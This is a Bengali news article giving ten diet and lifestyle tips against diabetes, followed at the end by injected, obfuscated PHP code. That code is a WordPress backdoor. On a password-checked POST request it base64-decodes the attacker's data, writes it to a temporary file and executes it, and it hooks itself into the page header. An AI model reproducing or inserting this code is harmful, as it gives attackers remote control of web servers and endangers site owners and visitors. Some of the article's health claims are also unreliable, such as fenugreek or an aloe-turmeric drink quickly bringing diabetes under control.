সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

ডায়াবেটিস থেকে দূরে থাকতে চান?

news-image

অনলাইন ডেস্ক : বর্তমান সময়ের অন্যতম মরণব্যাধি রোগ ডায়াবেটিস। যেকোনো বয়সের মানুষই এই রোগের শিকার হতে পারে। এ রোগে আক্রান্ত রোগী নানারকম অসুবিধার সম্মুখীন হতে থাকেন। কিছু সাধারণ নিয়ম-কানুন মেনে চললে ডায়াবেটিস থেকে নিজেকে দূরে রাখতে পারবেন। নিয়মগুলো যুক্তরাষ্ট্রভিত্তিক সংবাদমাধ্যম এবিসি নিউজের এক প্রতিবেদনে জানানো হয়।

১. প্রতিদিন বাদাম খান

বাদামে উপস্থিত আনস্যাচুরেটেড ফ্যাট, প্রোটিন এবং একাধিক ভিটামিন, শরীরে প্রবেশের পর একদিকে যেমন খারাপ কোলেস্টেরলের মাত্রা কমতে শুরু করে, তেমনি ইনসুলিনের কর্মক্ষমতাকে বাড়িয়ে তোলে। ফলে স্বাভাবিকভাবেই রক্তে শর্করার মাত্রা বৃদ্ধি পাওয়ার আশঙ্কা কমে যায়।

২. কার্বোহাইড্রেট সমৃদ্ধ খাবার কম খেতে হবে

ভাতের মতো কার্বোহাইড্রেট সমৃদ্ধ খাবার বেশি করে খেলে শরীরে হঠাৎ করে শর্করার মাত্রা বেড়ে যাওয়ার আশঙ্কা থাকে। ফলে স্বাভাবিকভাবেই সুগারের মাত্রা বেড়ে যায়। এ কারণেই ডায়াবেটিস রোগীদের ভাত খেতে নিষেধ করেন চিকিৎসকেরা।

৩. প্রতিদিন বার্লি খান

বার্লিতে রয়েছে প্রচুর মাত্রায় ফাইবার, যা দীর্য সময় পেট ভরিয়ে রাখে। সেই সঙ্গে শর্করার মাত্রা যাতে ঠিক থাকে, সেদিকেও খেয়াল রাখে বার্লি।

৪. ভিটামিন ডি সমৃদ্ধ খাবার খান

শরীরে এই ভিটামিনটির ঘাটতি দেখা দিলে ইনসুলিন ভারসাম্য নষ্ট হয়। আর এমনটা হলে রক্তে সুগারের মাত্রা বাড়তে শুরু করে। তাই ভিটামিন ডি সমৃদ্ধ খাবার, যেমন- মাছ, দুধ, কমলা লেবুর রস, সোয়া দুধ এবং ডিম খাওয়া শুরু করুন।

৫. প্রতিদিন হাঁটুন

প্রতিদিন সকালে এবং বিকালে ১৫ মিনিট করে হাঁটলেই দেখবেন সুগার লেভেল স্বাভাবিক থাকবে। তাই ডায়াবেটিস রোগীদের জন্য হাঁটার কোনো বিকল্প নেই।

৬. ফাইবার জাতীয় খাবার বেশি খেতে হবে

একাধিক গবেষণায় দেখা গেছে, বেশি মাত্রায় ফাইবার রয়েছে এমন খাবার বেশি মাত্রায় খেলে রক্তে শর্করার মাত্রা নিয়ন্ত্রণে চলে আসে। সেই সঙ্গে হজম ক্ষমতার যেমন উন্নতি ঘটে, তেমনি ওজনও কমতে শুরু করে।

৭. মেথি খান

প্রতিদিন সকালে এক গ্লাস গরম দুধে এক চামচ মেথি পাউডার মিশিয়ে খাওয়া শুরু করুন। অল্প দিনেই দেখবেন ডায়াবেটিস একেবারে নিয়ন্ত্রণে চলে আসবে। কারণ মেথিতে উপস্থিত বিশেষ কিছু উপাদান দ্রুত শর্করার মাত্রা কমাতে গুরুত্বপূর্ণ ভূমিকা পালন করে থাকে।

৮. অ্যালোভেরা, সঙ্গে হলুদ

পরিমাণ মতো হলুদ গুঁড়োর সঙ্গে অ্যালোভেরার জুস, অল্প করে তেজপাতা এবং পানি মিশিয়ে একটা পানীয় বানিয়ে ফেলুন। প্রতিদিন রাতে খাবারের আগে এই পানীয়টি খেলে ডায়াবেটিস নিয়ন্ত্রণে চলে আসবে।

৯. ফল খাওয়ার অভ্যাস করুন

জুস না খেয়ে ফল খাওয়া শুরু করুন। আসলে ফল খেলে শরীরে যে পরিমাণ ফাইবার যায়, তার থেকে অনেক কম যায় জুস খেলে। আর একথা তো সবাই জানেন যে শরীরে ফাইবারের পরিমাণ যত বাড়বে, তত বেশি রোগ দূরে থাকবে। সেই সঙ্গে কমবে শর্করার মাত্রাও।

১০. প্রতিদিন ৩-৪ লিটার পানি পান করুন

রক্তে শর্করার মাত্রা স্বাভাবিক রাখতে বেশি করে পানি পান করতে হবে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}